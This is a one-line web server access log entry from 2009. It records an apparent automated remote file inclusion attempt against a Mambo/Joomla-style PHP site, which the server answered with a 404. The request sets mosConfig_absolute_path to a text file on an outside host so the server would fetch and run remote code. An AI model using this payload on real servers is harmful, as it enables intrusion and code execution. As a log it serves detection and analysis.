217.22.60.25 - - [07/Mar/2009:13:08:10 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
